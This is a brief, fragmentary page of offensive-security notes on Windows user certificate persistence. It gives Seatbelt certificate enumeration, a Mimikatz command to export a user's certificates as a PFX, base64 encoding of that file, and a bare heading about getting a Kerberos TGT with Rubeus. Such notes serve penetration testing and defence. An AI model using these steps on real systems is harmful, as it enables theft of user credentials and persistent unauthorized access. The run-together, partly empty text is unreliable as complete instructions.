User & Computer Persistance
User Persistance
Enumerate certificates
Seatbelt.exe CertificatesMimikatz export
mimikatz crypto::certificates /exportdownload CURRENT_USER_My_0_Nina Lamb.pfxBase64 encode the pfx file
cat /mnt/c/Users/Attacker/Desktop/CURRENT_USER_My_0_Nina\ Lamb.pfx | base64 -w 0Rubeus to obtain a TGT
Computer Persistance
Extract
Last updated